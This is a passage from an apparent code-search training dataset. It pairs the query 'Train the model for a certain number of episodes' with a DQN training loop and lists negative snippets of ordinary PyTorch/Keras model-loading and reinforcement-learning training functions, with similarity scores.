key, val\n # in checkpoint['state_dict'].items()}\n #\n # # load weights\n # model.load_state_dict(checkpoint['state_dict'])\n # print(\"Loaded\")\n # else:\n # model = None\n # print(\"=> no checkpoint found at '{}'\".format(path))\n\n # net = models.__dict__['ResNet18'](low_dim=128)\n # net = 
models.__dict__['resnet18'](low_dim=128)\n\n net = models.__dict__['alexnet'](out=128)\n # net = models.__dict__['Alexnet_C'](out=args.low_dim)\n\n net = torch.nn.DataParallel(net, device_ids=range(torch.cuda.device_count()))\n net.load_state_dict(checkpoint['net'])\n\n return net", "def load_checkpoint(self, model):\n print(f\"load model {self.save_model_path}\")\n model.load_state_dict(torch.load(self.save_model_path))", "def load_model(filename):\n checkpoint = torch.load(filename)\n model = QNetwork(checkpoint['input_size'], checkpoint['output_size'], checkpoint['hidden_layers'])\n model.load_state_dict(checkpoint['state_dict'])\n return model", "def load_h5(filename: str, **kwargs):\n return open_h5(filename, 'r', **kwargs)", "def load_model(self, model_path):\n\n\t\tmodel_path = osp.abspath(model_path)\n\t\tmodel_weights_path = osp.splitext(model_path)[0] + \".bin\"\n\n\t\tself.Helpers.logger.info(\"Loading the model from '%s'\" % (model_path))\n\t\tmodel = self.context.ie_core.read_network(model_path, model_weights_path)\n\t\tself.Helpers.logger.info(\"Model loaded\")\n\n\t\treturn model", "def load_checkpoint_ram(self, checkpoint, train=True):\n # -- For all tasks, create a corresponding head, otherwise the restoring would not work due to mismatching weights -- #\n self.mh_network.add_n_tasks_and_activate(self.already_trained_on[str(self.fold)]['tasks_at_time_of_checkpoint'],\n self.already_trained_on[str(self.fold)]['active_task_at_time_of_checkpoint'])\n \n # -- Set the network to the full MultiHead_Module network to restore everything -- #\n self.network = self.mh_network\n \n # -- Use parent class to save checkpoint for MultiHead_Module model consisting of self.model, self.body and self.heads -- #\n super().load_checkpoint_ram(checkpoint, train)\n\n # -- Reset network to the assembled model to continue training -- #\n self.network = self.mh_network.model", "def load_checkpoint(model, save_path):\n model.load_state_dict(torch.load(save_path))", "def load_weights(self, file_path):\n self.model.load_weights(file_path + '/policy_network.h5')\n print(\"\\nrestored weights of the policy network.\\n\")", "def deserialize_model(hypes):\n model_path_trained = hypes['segmenter']['serialized_model_path']\n if not os.path.isfile(model_path_trained):\n logging.warning(\"No model found at '%s'.\", model_path_trained)\n network_path = hypes['segmenter']['network_path']\n network = imp.load_source('sst.network', network_path)\n trained = network.load_model(hypes)\n return trained", "def load_model(self, win_len, axis):\n\n print('Load model')\n if 'ouisir' not in self.name_dataset.lower():\n self.feature_extractor = resnet2D(\n False, 0, 0, stride=2, feature_generator=True)\n else:\n self.feature_extractor = resnet2D(\n False, 0, 0, stride=2, feature_generator=True)\n self.feature_extractor.build((None, win_len, axis, 1))\n self.feature_extractor.load_weights(\n self.path_save_model + self.name_model + '.h5', by_name=True)\n\n print('Load mean and std')\n self.mean = np.load(self.path_save_model + 'mean.npy')\n self.std = np.load(self.path_save_model + 'std.npy')", "def load(self, folder):\n # load the weights from input folder\n self.generator.load_weights('%s/generator.h5'%folder)\n self.critic.load_weights('%s/critic.h5'%folder)", "def load_model(self, filename):\n event = teca_time_py_event('teca_deeplab_ar_detect::load_model')\n\n # this creates OpenMP thread pools and imports torch\n # it must be called *before* we import torch\n self.initialize()\n\n # import our torch codes only now 
that torch has been initialized\n global teca_deeplab_ar_detect_internals\n from teca_deeplab_ar_detect_internals \\\n import teca_deeplab_ar_detect_internals\n\n # create an instance of the model\n model = teca_deeplab_ar_detect_internals.DeepLabv3_plus(\n n_classes=1, _print=False)\n\n # load model weights from state on disk\n super().load_model(filename, model)", "def load_model():\r\n model = MobileNetV2(weights=\"imagenet\")\r\n print(\"Model loaded\")\r\n return model", "def load_network(self, serialize_network):\n layer = self.first_layer\n current_index = 0\n for i in range(self.number_of_layers):\n for neuron in layer.neuron_array:\n number_of_weights = len(neuron.weights)\n neuron.weights = serialize_network[current_index: number_of_weights]\n neuron.bias = serialize_network[current_index + number_of_weights]\n current_index += number_of_weights + 1\n if i != self.number_of_layers - 1:\n layer = layer.next_layer", "def load(self, filename='nn_model.pkl'):\n with open(filename,'rb') as f:\n nn_model = pickle.load(f, encoding='bytes')\n f.close()\n\n self.W = nn_model.W\n self.b = nn_model.b\n\n self.num_bn_layers = nn_model.num_bn_layers\n self.bn = nn_model.num_bn_layers > 0\n self.hiddens = nn_model.hiddens\n self.nlayers = len(nn_model.hiddens) + 1\n self.input_size = nn_model.input_size\n self.output_size = nn_model.output_size\n self.activations = nn_model.activations\n self.criterion = nn_model.criterion\n self.lr = nn_model.lr\n self.momentum = nn_model.momentum\n\n if self.bn:\n self.bn_layers = nn_model.bn_layers\n\n self.train_mode = nn_model.train_mode\n self.batch_size = nn_model.batch_size\n self.epochs = nn_model.epochs", "def _load_layer_weights(self, layer, name, h5file): \n group = h5file[name]\n length = group['length'][0]\n weights = [group[\"{}\".format(idx)] for idx in range(length)]\n layer.set_weights(weights)", "def save_network(network, fpath):\n\twith open(fpath, \"wb\") as f:\n\t\tpickle.dump(network, f)", "def load_net(self, file_path):\n \twith open(file_path,'r') as f:\n \t\tparams = json.loads(f.read())\n \t#\n \tweights = np.array(params['weights'])\n \tbiases = np.array(params['biases'])\n \t# Since ann.ANN needs to be initialized with some data, which\n \t# we dont have yet, we are gonna make a canvas array with\n \t# the correct dimensions from the weights\n \tfake_data = np.array([np.zeros(len(weights[-1]))])\n \t# initialize stacked net\n \tself.init_stacked_net(fake_data)\n \t# fill in weights and biases\n \tself.stacked_net.weights = weights\n \tself.stacked_net.biases = biases", "def load(self, path):\n checkpoint = torch.load(path, map_location=torch.device(\"cpu\"))\n self.load_state_dict(checkpoint[\"state_dict\"])\n self.on_epoch_start(checkpoint[\"epoch\"])\n self.logger.info(\"Loaded controller network from %s\", path)", "def load(self):\n checkpoint = torch.load(self.checkpoint_path,\n map_location=self.net.device)\n self.load_state_dict(checkpoint)\n del checkpoint", "def _loadHDF5File(self, filename):\n matfile = h5py.File(filename)\n\n self.StokesI = np.transpose(matfile['StokesI'][:,:])\n self.StokesQ = np.transpose(matfile['StokesQ'][:,:])\n self.StokesU = np.transpose(matfile['StokesU'][:,:])\n self.StokesV = np.transpose(matfile['StokesV'][:,:])\n self.detectorPosition = matfile['detectorPosition'][:,0]\n self.detectorDirection = matfile['detectorDirection'][:,0]\n self.detectorVisang = matfile['detectorVisang'][0,0]\n\n try: self.wall = matfile['wall'][:,:]\n except KeyError: pass\n\n try: self.separatrix = 
matfile['separatrix'][:,:]\n except KeyError: pass", "def load_model():\n # Model reconstruction from JSON file\n with open('model/model_strides_25_13-25-54.json', 'r') as f:\n model = model_from_json(f.read())\n # Load weights into the new model\n model.load_weights('model/bestmodel_weights_strides.hdf5')\n return model", "def load(self, output_folder: str=None):\n\n # Load the genesis model.\n if output_folder is None:\n output_folder = os.path.join(os.path.dirname(__file__), 'model')\n\n # Load necessary files.\n self.n_final = pickle.load(open(os.path.join(\n output_folder, 'n_final.pkl'), 'rb'))\n self.min_values = pickle.load(open(os.path.join(\n output_folder, 'min_params.pkl'), 'rb'))\n self.norm_params = pickle.load(open(os.path.join(\n output_folder, 'norm_params.pkl'), 'rb'))\n self.label_encoder = pickle.load(open(os.path.join(\n output_folder, 'label_encoder.pkl'), 'rb'))\n\n # Load network.\n net = Net(self.n_final)\n net.to(self.device)\n\n # If a refitted model exists.\n if os.path.exists(os.path.join(output_folder, 'state_dict.refit.pt')):\n genesis_model_path = os.path.join(\n output_folder, 'state_dict.refit.pt')\n else:\n genesis_model_path = os.path.join(output_folder, 'state_dict.pt')\n\n net.load_state_dict(torch.load(genesis_model_path))\n\n '''\n # Check the number of parameters in each layer.\n for key in torch.load(genesis_model_path).keys():\n if 'bias' in key:\n print(key, torch.load(genesis_model_path)[key].shape)\n '''\n\n self.net = net", "def load_model(self):\n self.opt.load_weights_folder = os.path.expanduser(self.opt.load_weights_folder)\n\n assert os.path.isdir(self.opt.load_weights_folder), \\\n \"Cannot find folder {}\".format(self.opt.load_weights_folder)\n print(\"loading model from folder {}\".format(self.opt.load_weights_folder))\n\n for model_name in [\"encoder\", \"decoder\"]:\n print(\"Loading {} weights...\".format(model_name))\n path = os.path.join(self.opt.load_weights_folder, \"{}.pth\".format(model_name))\n model_dict = self.encoder.state_dict() if model_name == \"encoder\" else self.decoder.state_dict()\n pretrained_dict = torch.load(path)\n pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}\n model_dict.update(pretrained_dict)\n if model_name == \"encoder\":\n self.encoder.load_state_dict(model_dict)\n else:\n self.decoder.load_state_dict(model_dict)\n\n # loading adam state\n optimizer_load_path = os.path.join(self.opt.load_weights_folder, \"adam.pth\")\n if os.path.isfile(optimizer_load_path):\n print(\"Loading Adam weights\")\n optimizer_dict = torch.load(optimizer_load_path)\n self.optimizer.load_state_dict(optimizer_dict)\n else:\n print(\"Cannot find Adam weights so Adam is randomly initialized\")", "def load(self):\n if self.model is None:\n raise Exception(\"Build the model first.\")\n\n print(\"Loading model checkpoint {} ...\\n\".format(self.config[\"model\"][\"restore_model\"]))\n self.model.load_weights(self.config[\"model\"][\"restore_model\"])\n print(\"Model loaded!\")", "def load(self):\n if self.model is None:\n raise Exception(\"Build the model first.\")\n\n print(\"Loading model checkpoint {} ...\\n\".format(self.config[\"model\"][\"restore_model\"]))\n self.model.load_weights(self.config[\"model\"][\"restore_model\"])\n print(\"Model loaded!\")", "def load_net(filepath):\n\twith open(filepath, 'r') as fh:\n\t\treturn load(file = fh)", "def loadNetwork(path, arch):\n if arch in resnet.__dict__:\n model = resnet.__dict__[arch]()\n model.load_state_dict(torch.load(path, 
map_location=device))\n return model\n elif arch in other_resnet.__dict__:\n model = other_resnet.__dict__[arch]()\n model.load_state_dict(torch.load(path, map_location=device))\n return model\n elif arch in vgg.__dict__:\n model = vgg.__dict__[arch]()\n model.load_state_dict(torch.load(path, map_location=device))\n return model", "def load(self, filename):\n\n c = torch.load(filename)\n\n if type(c) is dict:\n sd = c['state_dict']\n self.net.load_state_dict(sd)\n if 'monitors' in c: # Remove the branching eventually\n self.monitors = c['monitors']\n else:\n self.monitors = {'loss_train': c['train_monitor'], 'loss_val': c['val_monitor'],\n 'accu_train': MetricHistory(), 'accu_val': MetricHistory()}\n if 'optimizer' in c: # Remove the branching eventually\n self.optimizer.load_state_dict(c['optimizer'])\n else:\n raise RuntimeError('Unsupported checkpoint. (Not a dict)')\n\n self.parent = filename\n self.last_checkpoint = filename\n self.start_epoch = self.monitors['loss_train'].num_epochs", "def load_network(file_name):\n with open(file_name) as file:\n data = json.load(file)\n\n cost_fn = getattr(sys.modules[__name__], data[\"cost_func\"])\n act_fn = getattr(sys.modules[__name__], data[\"act_func\"])\n metric = getattr(sys.modules[__name__], data[\"metric\"])\n\n network = Network([1, 1], act_func=act_fn, cost_func=cost_fn, metric=metric)\n network.layers_num = data[\"layers_num\"]\n network.weights = [np.array(w) for w in data[\"weights\"]]\n network.biases = [np.array(b) for b in data[\"biases\"]]\n\n return network", "def load_opcodes_subnetwork_pretrained_weights(self, model):\n print(\"ToImplement\")", "def restore_model(self, prefix):\n model_file = prefix + \".json\"\n weight_file = prefix + \".h5\"\n self.model = model_from_json(json.load(open(model_file)))\n self.model.load_weights(weight_file)\n return self\n model.load_weights(\"./output/model.h5\")", "def load_model(self, model_path, load_ae=True, map_location='cpu'):\n assert load_ae and (self.ae_net is not None), 'The trainer has not been initialized with an Autoencoder. 
It can thus not be loaded.'\n model_dict = torch.load(model_path, map_location=map_location)\n self.c = model_dict['c']\n self.net.load_state_dict(model_dict['net_dict'])\n\n if load_ae and (self.ae_net is not None):\n self.ae_net.load_state_dict(model_dict['ae_net_dict'])", "def load_model():\r\n global model # 下面的那个predict也是要用的 所以在这里定义为全局\r\n model = DenseNet(n_input_channels=1, num_init_features=64,\r\n growth_rate=32,\r\n block_config=(3, 6, 12, 8), num_classes=4).to(device)\r\n model.load_state_dict(torch.load(\"./model29.pkl\"))\r\n model.eval()", "def load_nn(self, filename):\n self.weights_and_biases = (np.load(filename, allow_pickle=True)).tolist()\n print('Weights and biases are loaded')", "def load_bot(self, prefix=\"model_data/\"):\n attributes = np.load(prefix + \"model_attributes.npy\",\n allow_pickle='TRUE').item()\n \n self.num_rounds = attributes[\"num_rounds\"]\n self.c = attributes[\"c\"]\n self.alpha = attributes[\"alpha\"]\n if \"loss_history\" in attributes:\n self.loss_history = attributes[\"loss_history\"]\n self.evaluation_history_old = attributes[\"evaluation_history_old\"]\n self.evaluation_history_ran = attributes[\"evaluation_history_ran\"]\n \n network_load_command = attributes[\"network_load_command\"]\n exec(network_load_command)\n self.network.load_network(prefix)", "def load(self, filename):\n with open(filename, 'rb') as f:\n data = pickle.load(f)\n # Set biases and weights\n self.W_input_to_hidden = data['wi']\n self.W_hidden_to_hidden = data['wh']\n self.W_hidden_to_output = data['wo']", "def load_model(self, sess, pb_model_path):\n\n logging.info(\"Import yolo model from pb start .......\")\n\n with sess.as_default():\n with sess.graph.as_default():\n with tf.gfile.FastGFile(pb_model_path, 'rb') as f_handle:\n logging.info(\"ParseFromString start .......\")\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f_handle.read())\n logging.info(\"ParseFromString end .......\")\n\n tf.import_graph_def(graph_def, name='')\n logging.info(\"Import_graph_def end .......\")\n\n logging.info(\"Import yolo model from pb end .......\")", "def load_networks(self, dir_weights, idx_load):\n\n path_p = dir_weights + 'p_{}.ckpt'\n path_D = dir_weights + 'D_{}.ckpt'\n path_U = dir_weights + 'U_{}.ckpt'\n\n self.net_p.load_weights(path_p.format(idx_load))\n self.net_D.load_weights(path_D.format(idx_load))\n self.net_U.load_weights(path_U.format(idx_load))", "def load(self, filename):\n with open(filename, 'rb') as f:\n data = pickle.load(f)\n # Set biases and weights\n self.W_input_to_hidden = data['wi']\n self.W_hidden_to_output = data['wo']", "def load_model(self, filename):\r\n pass", "def load_block(state_dict, eval_type, src_name, tgt_name, h5_dir):\n h5f = h5py.File(os.path.join(h5_dir, '{:s}_{:s}.h5'.format(eval_type, src_name)), 'r')\n\n state_dict[tgt_name + '.branch_0.conv3d.weight'] = torch.from_numpy(h5f['b0_weight'][...]).permute(4, 3, 0, 1, 2)\n output_channels = state_dict[tgt_name + '.branch_0.conv3d.weight'].size(0)\n # Sonnet model does not scale batch norm output, it only adds bias.\n state_dict[tgt_name + '.branch_0.bn.weight'] = torch.ones(output_channels)\n state_dict[tgt_name + '.branch_0.bn.bias'] = torch.from_numpy(h5f['b0_beta'][...])\n state_dict[tgt_name + '.branch_0.bn.running_mean'] = torch.from_numpy(h5f['b0_mv_mean'][...])\n state_dict[tgt_name + '.branch_0.bn.running_var'] = torch.from_numpy(h5f['b0_mv_var'][...])\n\n state_dict[tgt_name + '.branch_1a.conv3d.weight'] = torch.from_numpy(h5f['b1a_weight'][...]).permute(4, 3, 0, 1, 2)\n 
output_channels = state_dict[tgt_name + '.branch_1a.conv3d.weight'].size(0)\n # Sonnet model does not scale batch norm output, it only adds bias.\n state_dict[tgt_name + '.branch_1a.bn.weight'] = torch.ones(output_channels)\n state_dict[tgt_name + '.branch_1a.bn.bias'] = torch.from_numpy(h5f['b1a_beta'][...])\n state_dict[tgt_name + '.branch_1a.bn.running_mean'] = torch.from_numpy(h5f['b1a_mv_mean'][...])\n state_dict[tgt_name + '.branch_1a.bn.running_var'] = torch.from_numpy(h5f['b1a_mv_var'][...])\n state_dict[tgt_name + '.branch_1b.conv3d.weight'] = torch.from_numpy(h5f['b1b_weight'][...]).permute(4, 3, 0, 1, 2)\n output_channels = state_dict[tgt_name + '.branch_1b.conv3d.weight'].size(0)\n # Sonnet model does not scale batch norm output, it only adds bias.\n state_dict[tgt_name + '.branch_1b.bn.weight'] = torch.ones(output_channels)\n state_dict[tgt_name + '.branch_1b.bn.bias'] = torch.from_numpy(h5f['b1b_beta'][...])\n state_dict[tgt_name + '.branch_1b.bn.running_mean'] = torch.from_numpy(h5f['b1b_mv_mean'][...])\n state_dict[tgt_name + '.branch_1b.bn.running_var'] = torch.from_numpy(h5f['b1b_mv_var'][...])\n\n state_dict[tgt_name + '.branch_2a.conv3d.weight'] = torch.from_numpy(h5f['b2a_weight'][...]).permute(4, 3, 0, 1, 2)\n output_channels = state_dict[tgt_name + '.branch_2a.conv3d.weight'].size(0)\n # Sonnet model does not scale batch norm output, it only adds bias.\n state_dict[tgt_name + '.branch_2a.bn.weight'] = torch.ones(output_channels)\n state_dict[tgt_name + '.branch_2a.bn.bias'] = torch.from_numpy(h5f['b2a_beta'][...])\n state_dict[tgt_name + '.branch_2a.bn.running_mean'] = torch.from_numpy(h5f['b2a_mv_mean'][...])\n state_dict[tgt_name + '.branch_2a.bn.running_var'] = torch.from_numpy(h5f['b2a_mv_var'][...])\n state_dict[tgt_name + '.branch_2b.conv3d.weight'] = torch.from_numpy(h5f['b2b_weight'][...]).permute(4, 3, 0, 1, 2)\n output_channels = state_dict[tgt_name + '.branch_2b.conv3d.weight'].size(0)\n # Sonnet model does not scale batch norm output, it only adds bias.\n state_dict[tgt_name + '.branch_2b.bn.weight'] = torch.ones(output_channels)\n state_dict[tgt_name + '.branch_2b.bn.bias'] = torch.from_numpy(h5f['b2b_beta'][...])\n state_dict[tgt_name + '.branch_2b.bn.running_mean'] = torch.from_numpy(h5f['b2b_mv_mean'][...])\n state_dict[tgt_name + '.branch_2b.bn.running_var'] = torch.from_numpy(h5f['b2b_mv_var'][...])\n\n state_dict[tgt_name + '.branch_3b.conv3d.weight'] = torch.from_numpy(h5f['b3_weight'][...]).permute(4, 3, 0, 1, 2)\n output_channels = state_dict[tgt_name + '.branch_3b.conv3d.weight'].size(0)\n # Sonnet model does not scale batch norm output, it only adds bias.\n state_dict[tgt_name + '.branch_3b.bn.weight'] = torch.ones(output_channels)\n state_dict[tgt_name + '.branch_3b.bn.bias'] = torch.from_numpy(h5f['b3_beta'][...])\n state_dict[tgt_name + '.branch_3b.bn.running_mean'] = torch.from_numpy(h5f['b3_mv_mean'][...])\n state_dict[tgt_name + '.branch_3b.bn.running_var'] = torch.from_numpy(h5f['b3_mv_var'][...])", "def _load_model(self):\r\n filepath = f\"Models/{self.environment.name}/q_network\"\r\n # Check if model exists in default directory\r\n if path.exists(filepath):\r\n self.q_network = NetworkBuilder._load_model(filepath)\r\n self.target_network = NetworkBuilder._load_model(filepath)\r\n print(\"Models loaded\")\r\n return True\r\n else:\r\n print(f\"'{filepath}' not found\")\r\n return False", "def load_checkpoint(self, file):\n \"\"\"Load \"\"\"\n chkpnt = torch.load(file)\n self.load_state_dict(chkpnt['model_state_dict'])", "def 
load_model(model_path, model_name, net=None):\n config_file, model_file = _get_config_file(model_path, model_name), _get_model_file(model_path, model_name)\n assert os.path.isfile(\n config_file\n ), f'Could not find the config file \"{config_file}\". Are you sure this is the correct path and you have your model config stored here?'\n assert os.path.isfile(\n model_file\n ), f'Could not find the model file \"{model_file}\". Are you sure this is the correct path and you have your model stored here?'\n with open(config_file) as f:\n config_dict = json.load(f)\n if net is None:\n act_fn_name = config_dict[\"act_fn\"].pop(\"name\").lower()\n act_fn = act_fn_by_name[act_fn_name](**config_dict.pop(\"act_fn\"))\n net = BaseNetwork(act_fn=act_fn, **config_dict)\n net.load_state_dict(torch.load(model_file, map_location=device))\n return net", "def load(path_to_model):\n pass", "def load_NeuralNet(self, path_model_dir, X_train, y_train, epochs):\n\n #fetch best params\n best_params_ = self.load('best_params_', 'dill', path_model_dir) \n \n #rebuild model_dict\n model_dict = _NeuralNet.DenseNet.model_dict(**best_params_)\n model_dict['best_model'] = _NeuralNet.utils.load_model(_os.path.join(path_model_dir,'best_estimator_.h5'))\n model_dict['best_params'] = best_params_ \n model_dict['best_cv_score'] = _np.nan\n\n return model_dict", "def load_h5_file(file_path):\n # load\n fr = h5py.File(file_path, 'r')\n a_group_key = list(fr.keys())[0]\n data = list(fr[a_group_key])\n # transform to appropriate numpy array \n data=data[0:]\n data = np.stack(data, axis=0)\n return data", "def load_h5_file(file_path):\n # load\n fr = h5py.File(file_path, 'r')\n a_group_key = list(fr.keys())[0]\n data = list(fr[a_group_key])\n # transform to appropriate numpy array \n data=data[0:]\n data = np.stack(data, axis=0)\n return data", "def load(self):\n try:\n if self.model.is_cuda:\n self.model.load_state_dict(torch.load(os.path.join(self.save_path, \"save_point.pth\")))\n else:\n self.model.load_state_dict(torch.load(os.path.join(self.save_path, \\\n \"save_point.pth\"), map_location=\"cpu\"))\n except:\n sys.exit(\"Unable to load previous model\")", "def load_model(self):\n saved_path = self.config.path_tmp / self.model.model_name\n if saved_path.exists():\n self.model.load_weights(str(saved_path / 'model.vec'))", "def save_as_hdf5(self, filename):", "def load_model(self):\n print(\"=============start loading models=============\")\n # load models from basemodel and fine-tune layers\n base_model = DenseNet(reduction=0.5, classes=1000, weights_path=BASE_WEIGHT_DIR)\n base_model.layers.pop()\n base_model.layers.pop()\n x4 = Dense(6, activation='relu')(base_model.layers[-1].output)\n o = Activation('softmax')(x4)\n\n model = Model(inputs=base_model.input, outputs=[o])\n model.load_weights(WEIGHT_DIR)\n\n self.model = model\n print(\"=============finish loading models=============\")", "def load_model(self, ckpt_fn):\n checkpoint = torch.load(ckpt_fn)\n self.net_.load_state_dict(checkpoint[\"model\"])\n self.optimizer_.load_state_dict(checkpoint[\"optimizer\"])\n self.epoch_ = checkpoint[\"epoch\"]\n self.global_step_ = checkpoint[\"global_step\"]\n self.model_samples_ = deque(checkpoint[\"model_samples\"])\n self.sampler.load_state_dict(checkpoint[\"sampler_state\"])\n self.ais_loss.load_state_dict(checkpoint[\"ais_state\"])\n self.replay_prob = checkpoint[\"replay_prob\"]\n self.max_replay = checkpoint[\"max_replay\"]", "def load(filename):\n f = open(filename, \"r\")\n data = json.load(f)\n f.close()\n net = 
MFoMNetwork(data[\"sizes\"])\n net.weights = [np.array(w) for w in data[\"weights\"]]\n net.biases = [np.array(b) for b in data[\"biases\"]]\n return net", "def load_weight(model):\n file = h5py.File(WEIGHT_SAVE, 'r')\n weight = []\n for i in range(len(file.keys())):\n weight.append(file['weight' + str(i)][:])\n model.set_weights(weight)", "def load(self, path: str):\n self.model.load_state_dict(torch.load(path))", "def load(self, path):\n checkpoint = torch.load(path)\n self.load_state_dict(checkpoint['model_state_dict'])\n self.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])", "def load(self, path):\n checkpoint = torch.load(path)\n self.load_state_dict(checkpoint['model_state_dict'])\n self.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])", "def load_pretrained_network(self):\n\n if self.manager is None or self.checkpoint is None:\n return False\n status = self.checkpoint.restore(self.manager.latest_checkpoint)\n return status", "def load_pretrained_network(self):\n\n if self.manager is None or self.checkpoint is None:\n return False\n status = self.checkpoint.restore(self.manager.latest_checkpoint)\n return status", "def test_save_load(tmp_path, num_mutations):\n\n def assert_networks_equal(net, loaded_net):\n assert net.in_size == loaded_net.in_size\n assert net.out_size == loaded_net.out_size\n assert net.p_initial_connection_enabled == loaded_net.p_initial_connection_enabled\n assert net.p_add_connection == loaded_net.p_add_connection\n assert net.p_add_node == loaded_net.p_add_node\n assert net.inherit_weights == loaded_net.inherit_weights\n assert net.activation_name == loaded_net.activation_name\n assert net.neurons_in_layer == loaded_net.neurons_in_layer\n assert net.connections == loaded_net.connections\n assert np.allclose(net.weights, loaded_net.weights)\n\n net = WeightLearningNetwork(5, 2, 0.5)\n for _ in range(num_mutations):\n net.mutate()\n\n # Save network, load it and check that everything is still correct.\n print(tmp_path / 'network.json')\n net.save(tmp_path / 'network.json')\n loaded_net = WeightLearningNetwork.load(tmp_path / 'network.json')\n assert_networks_equal(net, loaded_net)\n\n # Do this again after creating and deleting weight matrices.\n net.create_torch_layers()\n net.delete_torch_layers()\n\n net.save(tmp_path / 'network2.json')\n loaded_net = WeightLearningNetwork.load(tmp_path / 'network2.json')\n assert_networks_equal(net, loaded_net)\n\n # Check that we can still create weight matrices on loaded net.\n loaded_net.create_torch_layers()" ]
[ "0.71672744", "0.7150659", "0.6883396", "0.67808", "0.6710601", "0.66247654", "0.6531737", "0.64843845", "0.64828396", "0.6471173", "0.6450578", "0.64475465", "0.6441468", "0.64281887", "0.6308086", "0.6201771", "0.6194544", "0.61861485", "0.61786836", "0.61785096", "0.6171078", "0.61476314", "0.6136227", "0.6135521", "0.61285985", "0.6118241", "0.60975796", "0.609501", "0.6089223", "0.6079766", "0.60632443", "0.605296", "0.6022471", "0.6016407", "0.6016081", "0.6014992", "0.59946185", "0.59823644", "0.59776855", "0.5959942", "0.59392554", "0.59309524", "0.59289634", "0.59218866", "0.59205014", "0.5906885", "0.58989584", "0.5891236", "0.58876747", "0.5886988", "0.5872559", "0.58720714", "0.58666897", "0.5863366", "0.58626324", "0.5846325", "0.5840275", "0.583734", "0.58101135", "0.5808156", "0.58019584", "0.5799748", "0.5798377", "0.5798377", "0.5792889", "0.5782245", "0.57789737", "0.57475543", "0.57467103", "0.57405704", "0.57350004", "0.57318735", "0.57288694", "0.5723476", "0.5719712", "0.57181966", "0.57181257", "0.57161635", "0.57042634", "0.57021797", "0.5696144", "0.5693677", "0.5683629", "0.56824213", "0.56778884", "0.56749946", "0.56749946", "0.5669785", "0.5666282", "0.5653698", "0.564323", "0.56419456", "0.5637953", "0.56283355", "0.56268466", "0.5623275", "0.5623275", "0.56098896", "0.56098896", "0.56063575" ]
0.7140678
2
Train the model for a certain number of episodes
def trainAgent(self):
        for episode in range(self.TOT_EPISODES):
            #reset environment, stacked frames every episode.
            state = self.env.reset()
            rewards = 0
            #preprocess and stack the frame/state.
            state, self.stacked_frames = stack_frames(self.stack_size,
                self.stacked_frames, state, True)

            for step in range(self.MAX_STEPS):
                #for every step in episode:
                if (step%100==0):
                    print("Episode No.: ", episode, "Step No.: ", step)

                #agent acts - explores or exploitation of the model
                action = self.dqn.predictAction(state)
                #reduce epsilon for more exploitation later.
                self.dqn.decayEpsilon()
                #Perform the action and get the next_state, reward, and done vals.
                next_state, reward, done, _ = self.env.step(action)
                #append this state to the frame. Pass the previous stacked frame.
                next_state, self.stacked_frames = stack_frames(self.stack_size,
                    self.stacked_frames, next_state, False)
                rewards += reward
                #add this experience into memory (experience buffer)
                self.dqn.remember(state, action, reward, next_state, done)
                state = next_state

                if done:
                    print("took %d steps" %step)
                    print("Earned a total of reward equal to ", rewards)
                    break

                # TRAIN
                self.dqn.replay()
                #sync target_model and model weights every 10k steps.
                if step % 10000 == 9999:
                    self.dqn.target_train()

            # Save the network every 1000 iterations
            if episode % 5 == 4:
                print("Saving Network")
                self.dqn.save_network(self.path)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def train(self, num_episodes, max_episode_steps=100, save_freq=100, render=False):\n while self.episodes_done < num_episodes:\n self.trainOneEpisode(num_episodes, max_episode_steps, save_freq, render)\n self.saveCheckpoint()", "def train(self, training_steps=10):", "def train(\n self, num_episodes, max_episode_length, reward_network=None,\n ):\n\n for _ in range(num_episodes):\n self.train_episode(max_episode_length)\n\n if self.training_i % self.play_interval == 0:\n self.play(\n max_episode_length,\n self.render,\n reward_network=reward_network,\n )", "def train(self, iters, n_episodes):\n for i in range(iters):\n self.self_play(n_episodes)\n self.learn()", "def train_epoch(self) -> None:\n ct = self.config.training\n total_games = self._get_total_games()\n print(f\"Total Games: {total_games}\")\n train_size = int(0.9 * total_games)\n dataset_wrapper = DatasetWrapper(self.config)\n self.agent.model.fit(\n dataset_wrapper.get_dataset(train_size),\n epochs=ct.epoch_to_checkpoint,\n validation_data=dataset_wrapper.get_dataset(train_size, is_training=False),\n )", "def train(self):\n self.epoch = 0\n self.step = 0\n self.start_time = time.time()\n for self.epoch in range(self.num_epochs):\n print(\"EPOHA\")\n self.run_epoch()\n print(\"SAVE MODEL\")\n self.save_model()", "def _train_model(self):\n self.experiment = EpisodicExperiment(self.task, self.agent)\n n_epochs = int(self.rl_params.n_training_episodes / self.rl_params.n_episodes_per_epoch)\n logger.debug(\"Fitting user model over {} epochs, each {} episodes, total {} episodes.\"\n .format(n_epochs, self.rl_params.n_episodes_per_epoch, n_epochs*self.rl_params.n_episodes_per_epoch))\n for i in range(n_epochs):\n logger.debug(\"RL epoch {}\".format(i))\n self.experiment.doEpisodes(self.rl_params.n_episodes_per_epoch)\n self.agent.learn()\n self.agent.reset() # reset buffers", "def train_by_episode(self):\n # only REINFORCE and REINFORCE with baseline\n # use the ff code\n # convert the rewards to returns\n rewards = []\n gamma = 0.99\n for item in self.memory:\n [_, _, _, reward, _] = item\n rewards.append(reward)\n # rewards = np.array(self.memory)[:,3].tolist()\n\n # compute return per step\n # return is the sum of rewards from t til end of episode\n # return replaces reward in the list\n for i in range(len(rewards)):\n reward = rewards[i:]\n horizon = len(reward)\n discount = [math.pow(gamma, t) for t in range(horizon)]\n return_ = np.dot(reward, discount)\n self.memory[i][3] = return_\n\n # train every step\n for item in self.memory:\n self.train(item, gamma=gamma)", "def train(n_episodes=1000, max_n_steps=300, eps_start=1.0, eps_end=0.01, eps_decay=0.995, strCheckpointFile='checkpoint.pth'):\n\n global env\n scores = [] # list containing scores from each episode\n scores_window = deque(maxlen=100) # last 100 scores\n eps = eps_start # initialize epsilon\n num_saves = 0\n for i_episode in range(1, n_episodes + 1):\n env_info = env.reset(train_mode=True)[brain_name] # reset the environment\n state = env_info.vector_observations[0] # get the current state\n score = 0 # initialize the score\n last_t = max_n_steps\n for t in range(max_n_steps):\n action = agent.act(state, eps) # agent returns an epsilon-greedy action based on state\n env_info = env.step(action)[brain_name] # send the action to the environment\n next_state = env_info.vector_observations[0] # get the next state\n reward = env_info.rewards[0] # get the reward\n done = env_info.local_done[0] # see if episode has finished\n agent.step(state, action, 